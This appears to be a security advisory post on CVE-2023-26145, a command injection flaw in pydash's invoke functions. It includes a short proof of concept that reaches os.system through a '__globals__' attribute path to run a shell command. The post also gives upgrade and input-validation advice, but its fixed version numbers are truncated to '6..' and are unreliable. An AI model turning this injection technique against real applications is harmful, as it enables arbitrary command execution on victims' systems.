CVE-2023-26145: Command Injection Vulnerability in Pydash Package

A security vulnerability has been discovered in the popular Python library pydash. The vulnerability identified as CVE-2023-26145 affects versions of the package pydash before 6... This vulnerability allows an attacker to potentially execute arbitrary commands on the victim's system if specific prerequisites are satisfied.

In this long-read post, we will discuss the vulnerability, explain the prerequisites required, and provide references to the original sources.

Vulnerability Details

The vulnerability in pydash involves certain methods in the package, specifically pydash.objects.invoke() and pydash.collections.invoke_map(). These methods accept dotted paths (Deep Path Strings) to target nested Python objects, relative to the original source object. By exploiting these paths, an attacker can target internal class attributes and dict items to retrieve, modify or invoke nested Python objects.

Here is an example code snippet that demonstrates the use of pydash.objects.invoke() method

import pydash

class Foo:
    def bar(self, arg):
        return "Hello, " + arg

foo_instance = Foo()
result = pydash.objects.invoke(foo_instance, 'bar', 'World')
print(result)  # Output: Hello, World

The pydash.objects.invoke() method is vulnerable to Command Injection only when

1) The source object (argument 1) is not a built-in object such as list/dict (otherwise, the __init__.__globals__ path is not accessible)

2) The attacker has control over argument 2 (the path string) and argument 3 (the argument to pass to the invoked method)

The pydash.collections.invoke_map() method is also vulnerable, but it is harder to exploit because the attacker does not have direct control over the argument to be passed to the invoked function.

Exploit Example

In order to exploit the CVE-2023-26145 vulnerability, an attacker can use the following code snippet to execute arbitrary commands:

import pydash
import os

class Foo:
    pass

evil_path = '__class__.__init__.__globals__.' \
            'os.system'
evil_arg = 'echo "Hello, World" > evil_file.txt'

foo_instance = Foo()
pydash.objects.invoke(foo_instance, evil_path, evil_arg)

In this example, the invoke() method is used to access the os.system function within Python's os module to execute the command echo "Hello, World" > evil_file.txt, which creates a new file called evil_file.txt.

Mitigation

To mitigate this vulnerability, users of the pydash package should update their package to version 6.. or later which contains the fix. You can update it using the following command:

pip install --upgrade pydash

Moreover, when working with potentially untrusted inputs always validate and sanitize the inputs.

Reference Links

1. CVE-2023-26145 - NIST National Vulnerability Database
2. Pypi - pydash 6..
3. GitHub - pydash/pydash: The kitchen sink of Python utility libraries for doing "stuff" in a functional way.

Conclusion

CVE-2023-26145 is a serious security vulnerability in the pydash package which allows an attacker to potentially execute arbitrary commands on the victim's system. Developers using this package should update to the latest version and be cautious when using the affected methods with untrusted inputs. As always, remember to sanitize and validate any inputs that could potentially contain malicious data.

Timeline

Published on: 09/28/2023 05:15:45 UTC
Last modified on: 11/07/2023 04:09:28 UTC